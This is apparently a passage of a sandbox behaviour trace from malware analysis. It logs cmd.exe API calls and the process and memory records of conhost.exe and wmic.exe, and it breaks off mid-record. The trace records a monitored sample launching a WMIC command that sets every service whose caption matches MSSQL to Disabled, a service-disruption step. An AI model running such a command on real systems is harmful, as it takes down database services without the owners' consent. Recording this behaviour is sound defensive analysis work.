[0114.570] _wcsicmp (_String1="WMIC", _String2="COLOR") returned 20 [0114.570] _wcsicmp (_String1="WMIC", _String2="MKLINK") returned 10 [0114.570] _wcsicmp (_String1="WMIC", _String2="DIR") returned 19 [0114.570] _wcsicmp (_String1="WMIC", _String2="ERASE") returned 18 [0114.570] _wcsicmp (_String1="WMIC", _String2="DEL") returned 19 [0114.570] _wcsicmp (_String1="WMIC", _String2="TYPE") returned 3 [0114.570] _wcsicmp (_String1="WMIC", _String2="COPY") returned 20 [0114.570] _wcsicmp (_String1="WMIC", _String2="CD") returned 20 [0114.570] _wcsicmp (_String1="WMIC", _String2="CHDIR") returned 20 [0114.570] _wcsicmp (_String1="WMIC", _String2="RENAME") returned 5 [0114.570] _wcsicmp (_String1="WMIC", _String2="REN") returned 5 [0114.570] _wcsicmp (_String1="WMIC", _String2="ECHO") returned 18 [0114.570] _wcsicmp (_String1="WMIC", _String2="SET") returned 4 [0114.570] _wcsicmp (_String1="WMIC", _String2="PAUSE") returned 7 [0114.570] _wcsicmp (_String1="WMIC", _String2="DATE") returned 19 [0114.570] _wcsicmp (_String1="WMIC", _String2="TIME") returned 3 [0114.570] _wcsicmp (_String1="WMIC", _String2="PROMPT") returned 7 [0114.570] _wcsicmp (_String1="WMIC", _String2="MD") returned 10 [0114.570] _wcsicmp (_String1="WMIC", _String2="MKDIR") returned 10 [0114.571] _wcsicmp (_String1="WMIC", _String2="RD") returned 5 [0114.571] _wcsicmp (_String1="WMIC", _String2="RMDIR") returned 5 [0114.571] _wcsicmp (_String1="WMIC", _String2="PATH") returned 7 [0114.571] _wcsicmp (_String1="WMIC", _String2="GOTO") returned 16 [0114.571] _wcsicmp (_String1="WMIC", _String2="SHIFT") returned 4 [0114.571] _wcsicmp (_String1="WMIC", _String2="CLS") returned 20 [0114.571] _wcsicmp (_String1="WMIC", _String2="CALL") returned 20 [0114.571] _wcsicmp (_String1="WMIC", _String2="VERIFY") returned 1 [0114.571] _wcsicmp (_String1="WMIC", _String2="VER") returned 1 [0114.571] _wcsicmp (_String1="WMIC", _String2="VOL") returned 1 [0114.571] _wcsicmp (_String1="WMIC", _String2="EXIT") returned 18 [0114.571] _wcsicmp (_String1="WMIC", _String2="SETLOCAL") returned 4 [0114.571] _wcsicmp (_String1="WMIC", _String2="ENDLOCAL") returned 18 [0114.571] _wcsicmp (_String1="WMIC", _String2="TITLE") returned 3 [0114.571] _wcsicmp (_String1="WMIC", _String2="START") returned 4 [0114.571] _wcsicmp (_String1="WMIC", _String2="DPATH") returned 19 [0114.571] _wcsicmp (_String1="WMIC", _String2="KEYS") returned 12 [0114.571] _wcsicmp (_String1="WMIC", _String2="MOVE") returned 10 [0114.571] _wcsicmp (_String1="WMIC", _String2="PUSHD") returned 7 [0114.571] _wcsicmp (_String1="WMIC", _String2="POPD") returned 7 [0114.571] _wcsicmp (_String1="WMIC", _String2="ASSOC") returned 22 [0114.571] _wcsicmp (_String1="WMIC", _String2="FTYPE") returned 17 [0114.571] _wcsicmp (_String1="WMIC", _String2="BREAK") returned 21 [0114.571] _wcsicmp (_String1="WMIC", _String2="COLOR") returned 20 [0114.571] _wcsicmp (_String1="WMIC", _String2="MKLINK") returned 10 [0114.571] _wcsicmp (_String1="WMIC", _String2="FOR") returned 17 [0114.571] _wcsicmp (_String1="WMIC", _String2="IF") returned 14 [0114.571] _wcsicmp (_String1="WMIC", _String2="REM") returned 5 [0114.571] _wcsnicmp (_String1="WMIC", _String2="cmd ", _MaxCount=0x4) returned 20 [0114.571] SetErrorMode (uMode=0x0) returned 0x0 [0114.571] SetErrorMode (uMode=0x1) returned 0x0 [0114.571] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x4ed05d0, lpFilePart=0x4c5f2bc | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x4c5f2bc*="Desktop") returned 0x1d [0114.571] SetErrorMode (uMode=0x0) returned 0x1 [0114.572] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0114.572] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0114.576] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0114.578] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0114.578] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\WMIC.*", fInfoLevelId=0x1, lpFindFileData=0x4c5f048, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4c5f048) returned 0xffffffff [0114.578] GetLastError () returned 0x2 [0114.578] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0114.578] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\WMIC.*", fInfoLevelId=0x1, lpFindFileData=0x4c5f048, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4c5f048) returned 0xffffffff [0114.578] GetLastError () returned 0x2 [0114.578] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0114.578] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\WMIC.*", fInfoLevelId=0x1, lpFindFileData=0x4c5f048, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4c5f048) returned 0xffffffff [0114.578] GetLastError () returned 0x2 [0114.578] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0114.578] FindFirstFileExW (in: lpFileName="C:\\Windows\\WMIC.*", fInfoLevelId=0x1, lpFindFileData=0x4c5f048, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4c5f048) returned 0xffffffff [0114.578] GetLastError () returned 0x2 [0114.578] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0114.579] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.*", fInfoLevelId=0x1, lpFindFileData=0x4c5f048, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4c5f048) returned 0x4edb2b0 [0114.579] FindClose (in: hFindFile=0x4edb2b0 | out: hFindFile=0x4edb2b0) returned 1 [0114.579] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.COM", fInfoLevelId=0x1, lpFindFileData=0x4c5f048, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4c5f048) returned 0xffffffff [0114.579] GetLastError () returned 0x2 [0114.579] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.EXE", fInfoLevelId=0x1, lpFindFileData=0x4c5f048, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4c5f048) returned 0x4edb2b0 [0114.579] FindClose (in: hFindFile=0x4edb2b0 | out: hFindFile=0x4edb2b0) returned 1 [0114.579] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0114.579] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0114.579] GetConsoleTitleW (in: lpConsoleTitle=0x4c5f53c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0114.579] InitializeProcThreadAttributeList (in: lpAttributeList=0x4c5f468, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x4c5f44c | out: lpAttributeList=0x4c5f468, lpSize=0x4c5f44c) returned 1 [0114.579] UpdateProcThreadAttribute (in: lpAttributeList=0x4c5f468, dwFlags=0x0, Attribute=0x60001, lpValue=0x4c5f454, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x4c5f468, lpPreviousValue=0x0) returned 1 [0114.579] GetStartupInfoW (in: lpStartupInfo=0x4c5f4a0 | out: lpStartupInfo=0x4c5f4a0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0114.579] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0114.579] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0114.579] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0114.579] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0114.579] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0114.579] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0114.580] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0114.580] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0114.580] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0114.580] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0114.580] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0114.580] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0114.580] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0114.580] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0114.580] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0114.580] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0114.580] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0114.580] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0114.580] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0114.580] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0114.580] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0114.580] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0114.580] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0114.580] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0114.580] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0114.580] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0114.580] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0114.580] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0114.580] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0114.580] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0114.580] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0114.580] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0114.580] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0114.580] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0114.580] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0114.580] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0114.580] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0114.580] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0114.580] lstrcmpW (lpString1="\\WMIC.exe", lpString2="\\XCOPY.EXE") returned -1 [0114.581] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\Wbem\\WMIC.exe", lpCommandLine="WMIC SERVICE WHERE 'caption LIKE '%MSSQL%'' CALL ChangeStartMode 'Disabled'", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0x4c5f3f0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="WMIC SERVICE WHERE 'caption LIKE '%MSSQL%'' CALL ChangeStartMode 'Disabled'", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x4c5f43c | out: lpCommandLine="WMIC SERVICE WHERE 'caption LIKE '%MSSQL%'' CALL ChangeStartMode 'Disabled'", lpProcessInformation=0x4c5f43c*(hProcess=0xa8, hThread=0xa4, dwProcessId=0xf08, dwThreadId=0xf0c)) returned 1 [0114.587] CloseHandle (hObject=0xa4) returned 1 [0114.587] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0114.587] GetEnvironmentStringsW () returned 0x4ed9f68* [0114.588] FreeEnvironmentStringsA (penv="=") returned 1 [0114.588] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0115.386] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x4c5f3d4 | out: lpExitCode=0x4c5f3d4*=0x0) returned 1 [0115.386] CloseHandle (hObject=0xa8) returned 1 [0115.386] _vsnwprintf (in: _Buffer=0x4c5f4bc, _BufferCount=0x13, _Format="%08X", _ArgList=0x4c5f3dc | out: _Buffer="00000000") returned 8 [0115.386] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0115.386] GetEnvironmentStringsW () returned 0x4edb3e0* [0115.386] FreeEnvironmentStringsA (penv="=") returned 1 [0115.386] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0115.386] GetEnvironmentStringsW () returned 0x4edb3e0* [0115.386] FreeEnvironmentStringsA (penv="=") returned 1 [0115.386] DeleteProcThreadAttributeList (in: lpAttributeList=0x4c5f468 | out: lpAttributeList=0x4c5f468) [0115.386] _get_osfhandle (_FileHandle=1) returned 0x3c [0115.386] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0115.387] _get_osfhandle (_FileHandle=1) returned 0x3c [0115.387] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0115.387] _get_osfhandle (_FileHandle=0) returned 0x38 [0115.387] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0115.387] SetConsoleInputExeNameW () returned 0x1 [0115.387] GetConsoleOutputCP () returned 0x1b5 [0115.387] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0115.387] SetThreadUILanguage (LangId=0x0) returned 0x409 [0115.387] exit (_Code=0) Thread: id = 249 os_tid = 0xf04 Process: id = "53" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x63898000" os_pid = "0xef4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "52" os_parent_pid = "0xeec" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3451 start_va = 0x7f47c000 end_va = 0x7f47cfff entry_point = 0x0 region_type = private name = "private_0x000000007f47c000" filename = "" Region: id = 3452 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3453 start_va = 0xc8acb90000 end_va = 0xc8acbaffff entry_point = 0x0 region_type = private name = "private_0x000000c8acb90000" filename = "" Region: id = 3454 start_va = 0xc8acbb0000 end_va = 0xc8acbc3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c8acbb0000" filename = "" Region: id = 3455 start_va = 0xc8acbd0000 end_va = 0xc8acc0ffff entry_point = 0x0 region_type = private name = "private_0x000000c8acbd0000" filename = "" Region: id = 3456 start_va = 0x7df5ffad0000 end_va = 0x7ff5ffacffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffad0000" filename = "" Region: id = 3457 start_va = 0x7ff6c3f20000 end_va = 0x7ff6c3f42fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c3f20000" filename = "" Region: id = 3458 start_va = 0x7ff6c3f44000 end_va = 0x7ff6c3f44fff entry_point = 0x0 region_type = private name = "private_0x00007ff6c3f44000" filename = "" Region: id = 3459 start_va = 0x7ff6c3f4e000 end_va = 0x7ff6c3f4ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c3f4e000" filename = "" Region: id = 3460 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 3461 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3462 start_va = 0xc8acd80000 end_va = 0xc8ace7ffff entry_point = 0x0 region_type = private name = "private_0x000000c8acd80000" filename = "" Region: id = 3463 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 3464 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 3465 start_va = 0xc8acb90000 end_va = 0xc8acb9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c8acb90000" filename = "" Region: id = 3466 start_va = 0xc8acba0000 end_va = 0xc8acba6fff entry_point = 0x0 region_type = private name = "private_0x000000c8acba0000" filename = "" Region: id = 3467 start_va = 0xc8acc10000 end_va = 0xc8acccdfff entry_point = 0xc8acc10000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3468 start_va = 0xc8accd0000 end_va = 0xc8acd0ffff entry_point = 0x0 region_type = private name = "private_0x000000c8accd0000" filename = "" Region: id = 3469 start_va = 0xc8acd10000 end_va = 0xc8acd10fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c8acd10000" filename = "" Region: id = 3470 start_va = 0xc8acd20000 end_va = 0xc8acd26fff entry_point = 0x0 region_type = private name = "private_0x000000c8acd20000" filename = "" Region: id = 3471 start_va = 0xc8acd30000 end_va = 0xc8acd30fff entry_point = 0x0 region_type = private name = "private_0x000000c8acd30000" filename = "" Region: id = 3472 start_va = 0xc8acd40000 end_va = 0xc8acd40fff entry_point = 0x0 region_type = private name = "private_0x000000c8acd40000" filename = "" Region: id = 3473 start_va = 0xc8ace80000 end_va = 0xc8ad007fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c8ace80000" filename = "" Region: id = 3474 start_va = 0xc8ad010000 end_va = 0xc8ad01ffff entry_point = 0x0 region_type = private name = "private_0x000000c8ad010000" filename = "" Region: id = 3475 start_va = 0xc8ad020000 end_va = 0xc8ad1a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c8ad020000" filename = "" Region: id = 3476 start_va = 0xc8ad1b0000 end_va = 0xc8ae5affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c8ad1b0000" filename = "" Region: id = 3477 start_va = 0x7ff6c3e20000 end_va = 0x7ff6c3f1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c3e20000" filename = "" Region: id = 3478 start_va = 0x7ff6c3f4c000 end_va = 0x7ff6c3f4dfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c3f4c000" filename = "" Region: id = 3479 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 3480 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 3481 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 3482 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 3483 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 3484 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 3485 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 3486 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 3487 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 3488 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 3489 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 3490 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Thread: id = 246 os_tid = 0xef8 Thread: id = 247 os_tid = 0xefc Thread: id = 248 os_tid = 0xf00 Process: id = "54" image_name = "wmic.exe" filename = "c:\\windows\\syswow64\\wbem\\wmic.exe" page_root = "0x68958000" os_pid = "0xf08" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "52" os_parent_pid = "0xeec" cmd_line = "WMIC SERVICE WHERE 'caption LIKE '%MSSQL%'' CALL ChangeStartMode 'Disabled'" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3504 start_va = 0x9f0000 end_va = 0xa0ffff entry_point = 0x0 region_type = private name = "private_0x00000000009f0000" filename = "" Region: id = 3505 start_va = 0xa10000 end_va = 0xa11fff entry_point = 0x0 region_type = private name = "private_0x0000000000a10000" filename = "" Region: id = 3506 start_va = 0xa20000 end_va = 0xa33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a20000" filename = "" Region: id = 3507 start_va = 0xa40000 end_va = 0xa7ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a40000" filename = "" Region: id = 3508 start_va = 0xa80000 end_va = 0xabffff entry_point = 0x0 region_type = private name = "private_0x0000000000a80000" filename = "" Region: id = 3509 start_va = 0xac0000 end_va = 0xac3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ac0000" filename = "" Region: id = 3510 start_va = 0xad0000 end_va = 0xad0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ad0000" filename = "" Region: id = 3511 start_va = 0xae0000 end_va = 0xae1fff entry_point = 0x0 region_type = private name = "private_0x0000000000ae0000" filename = "" Region: id = 3512 start_va = 0x1300000 end_va = 0x1363fff entry_point = 0x1300000 region_type = mapped_file name = "wmic.exe" filename = "\\Windows\\SysWOW64\\wbem\\WMIC.exe" (normalized: "c:\\windows\\syswow64\\wbem\\wmic.exe") Region: id = 3513 start_va = 0x1370000 end_va = 0x536ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001370000" filename = "" Region: id = 3514 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3515 start_va = 0x7f7c0000 end_va = 0x7f7e2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f7c0000" filename = "" Region: id = 3516 start_va = 0x7f7e5000 end_va = 0x7f7e5fff entry_point = 0x0 region_type = private name = "private_0x000000007f7e5000" filename = "" Region: id = 3517 start_va = 0x7f7ec000 end_va = 0x7f7ecfff entry_point = 0x0 region_type = private name = "private_0x000000007f7ec000" filename = "" Region: id = 3518 start_va = 0x7f7ed000 end_va = 0x7f7effff entry_point = 0x0 region_type = private name = "private_0x000000007f7ed000" filename = "" Region: id = 3519 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3520 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3521 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 3522 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3523 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 3524 start_va = 0xb50000 end_va = 0xb5ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b50000" filename = "" Region: id = 3525 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: 